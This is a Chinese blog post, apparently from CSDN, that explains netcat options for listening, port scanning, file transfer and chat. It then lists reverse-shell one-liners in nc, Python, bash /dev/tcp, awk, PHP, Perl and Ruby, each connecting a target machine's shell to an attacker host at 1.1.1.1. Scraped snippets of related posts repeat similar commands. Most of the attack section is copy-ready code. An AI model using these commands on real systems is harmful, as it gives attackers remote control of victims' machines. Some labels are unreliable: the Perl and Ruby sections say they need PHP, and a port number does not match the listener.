nc的多种使用场景和各种反向shell方法

于 2024-08-16 17:09:09 发布
阅读量535 收藏 15
点赞数 5
文章标签: linux 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55894976/article/details/141264758
版权

nc常见参数说明

-l  //使用监听模式
-p  //设置本地主机使用的通信端口
-v  //详细输出
-e  //程序重定向
-n  //直接使用ip地址(不通过域名服务器
-z  //扫描端口时使用
>  //接收文件 后面加将接收的文件命名,例如>1.txt 意为将接受的文件命名为1.txt
<  //发送文件

常用命令

  • 端口监听

nc -l -p 9999

  • 端口扫描

nc -v 192.168.11.138 80 //扫描指定主机的端口
​
nc -v -z 192.18.11.138 20-1024  //扫描指定主机的某个端口段

  • 文件传输

nc -lp 333 >1.txt   //监听本地端口接收文件,将接收的文件重命名为1.txt
​
nc -vn 192.168.1.4 333 < test.txt -q 1  //与vps主机的333端口建立连接,并传输一个名为test.txt的文件

  • 简易聊天

# vps主机监听888端口
nc -l -p 888
​
# 目标主机连接vps的端口
nc -vn 192.168.1.4 888

  • 获取shell

shell分为正向和反向。如果客户端连接服务器,客户端想要获取服务器shell,称为正向shell。如果客户端连接服务器,服务器想要获取客户端shell,称为反向shell。(通俗来说,就是谁输入了/bin/sh类似的命令,谁的shell被拿)
​
反向shell通常用在开启了防火墙措施的目标机器上,例如防火墙过滤,端口转发等。(因为需要获取目标主机的shell才能进行下一步操作)
​
# 正向shell
正向shell即vps在自己的端口输出shell,客户端只监听vps的端口,客户端获取了服务器的shell
​
客户端:nc vps 444 //客户端监听vps的444端口
vps:nc -lvp 444 -e /bin/sh    //vps监听自己的端口并且把shell转发到这个端口,谁访问了这个端口谁拥有vps的shell
​
​
# 反向shell
反向shell即客户端输出shell给vps的指定端口,vps只监听端口,vps获取了客户端的shell
​
客户端:nc vps 999 -e /bin/sh  //监听vps的999端口,并将自己的shell转发给999端口
vps:nc -lvp 999
​
​

当目标主机没有nc时获取反向shell

python反向shell

# 原理
当目标主机没有nc工具时,但是有python环境,可利用python环境将shell反弹
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标主机
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'    //10.10.14.1为vps的ip,2222为vps监听的端口
​
成功之后vps会获得目标主机的shell

bash反向shell

# 原理
只适用于目标机器是linux
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标机器
/bash -i >& /dev/tcp/1.1.1.1/2222 0>&1
​
成功之后会vps获取shell
不成功原因:例如提示提示没有/dev/tcp 
参考链接:https://evilpan.com/2021/04/25/reverse-shell/
​
可以尝试awk获取shell

awk反向shell

# 原理
只适用于linux系统
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标机器
awk 'BEGIN {s = "/inet/tcp/0/1.1.1.1/2222"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
​
成功之后会获取目标机器的shell,并且所在目录是/dev

php反向shell

# 原理
适用于具有php环境的系统
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标机器
php -r '$sock=fsockopen("1.1.1.1",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

perl反向shell

# 原理
适用于具有php环境的系统
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标机器
perl -e 'use Socket;$i="1.1.1.1";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

rudy反向shell

# 原理
适用于具有php环境的系统
​
# 操作步骤
vps
nc -lvp 2222 //vps监听2222端口
​
目标机器
ruby -rsocket -e 'c=TCPSocket.new("1.1.1.1","4443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

じ 耐人
关注
正向shell和反弹shell
weixin_45936149的博客
03-26 9877
正向shell反弹shell的利用场景以及使用技巧
nc ssh 反向bash shell
hknaruto的专栏
04-25 260
nc 客户端(处于公网) nc -l -p 2222 服务端(处于内网) nc 客户端公网ip 2222 -e /bin/bash
web渗透【12】nc 反弹shell
司徒荆的博客
06-14 555
web渗透【12】nc 反弹shell
反向shell
m0_52011198的博客
02-20 509
反向shell是从被感染机器上发起一个连接,它提供攻击者shell访问被感染机器的权限。反向shell或者作为一个单独的恶意代码存在,或者作为一个复杂后门程序中的组件而存在。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
【渗透测试笔记】之【内网渗透——传输层隧道(nc使用nc的正反向shell、bash(1)
最新发布
2401_84969775的博客
05-13 421
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
内网渗透:nc反弹shell总结
安全大白
01-03 6528
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
shell的正向和反向
qq_46258964的博客
02-05 8767
正向shell反向shell 正向shell:控制端主动发起连接连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
使用socat反向Shell多台机器
fm18771120556的博客
03-16 680
原创:打码日记(微信公众号ID:codelogs),欢迎分享,转载请保留出处。 场景 很多时候,我们需要批量操作多台机器,业界一般使用Ansible来实现,但使用Ansible来操作多台机器的前提是需要有ssh权限的,可悲的是,对于开发人员来说,一般是没有正式环境机器的ssh权限的,只能通过一个指定的入口登录机器,也可以理解,毕竟正式环境如此重要。 不过,如果你的生产环境可以访问你的开发机,那么可以通过反向Shell来访问机器,然后将反向Shell与tmux结合,又可实现同时操作多台机器的效果,这就是本.
nc.zip_DOS_NC
09-19
下面我们将深入探讨Netcat在DOS环境中的使用方法和常见应用场景: 1. **监听端口**:Netcat可以开启一个监听端口,等待来自网络连接。例如,`nc -l -p 8080` 将启动一个监听8080端口的服务,任何连接到这个端口的...
nc.rar_nc python
09-20
1. "nc.exe" - 这可能是一个Windows可执行文件,通常代表Netcat工具的实现,用户可以使用这个工具进行端口扫描、数据传输、反向Shell网络操作。 2. "www.pudn.com.txt" - 这可能是一个文本文件,内容可能来自网站...
NC反弹shell的几种方法
qq_59350385的博客
05-12 9833
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc反向反弹shell 方法1:bash
netcat nc端口监听 反向连接中断问题
whatday的专栏
12-09 2834
当系统关闭ipv6时,进行 nc -lvp 5555 的监听时,一连上瞬间会断开,如图: 解决方案:开启nc ipv4 命令如下 nc -4 -lvp 5555 效果如图: 此时就不会断开了 ...
webshellnc反向连接获得cmd shell方法
whjtoby的专栏
06-16 2872
在webshell里操作CMD很不爽,直接上传一个nc,打入以下命令:nc -vv 你的IP地址 8000 -e cmd.exe然后在本机用nc监听一个端口,命令如下:nc -vv -l -p 8000稍微等下,就会连接一个shell了.补充:以上只是示范命令,实际操作如在海洋2006里的WScript.Shell程序运行器中,一定要输入nc的绝对路径!例子:路径:E:/wwwroot/www/c
反弹shell方法场景
weixin_45653478的博客
04-01 1658
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
反弹shell的正向连接反向连接
m0_61361405的博客
03-16 546
通常指受害主机(被控制端)监听一个端口,由控制主机(攻击端)主动去连接受害主机的过程。
2023网络安全 -- 正向连接反向连接
weixin_41489908的博客
06-26 1572
3、windows服务器上执行ifconfig命令,成功获取Linux服务器相关信息。4、Linux服务器执行如下命令,ip地址为windows服务器的地址。一、正向连接Linux服务器主动控制windows服务器。二、正向连接,windows服务器主动控制Linux服务器。2、Linux服务器主动连接windows服务器ip和端口。三、反向连接,windows服务器控制Linux服务器。四、反向连接Linux服务器控制服务器windows。2、windows服务器主动连接Linux服务器
nc连接获取shell
lionwerson的博客
12-09 5708
1.渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量: 客户端: nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端: nc -lvvp 4444 #监听4444端口 nc反向连接,防火墙阻挡外部流量: 服务端: nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略 客户端: ..
linux使用nc 反弹shell
qq_30890029的博客
04-20 519
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
nc正向shell反向shell
06-28
nc正向shell反向shell都是利用nc命令进行远程控制的方式。 正向shell是指攻击者在受害者主机上开启一个监听端口,等待攻击者连接并执行命令。攻击者通过nc命令连接到受害者主机的监听端口,然后在受害者主机上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值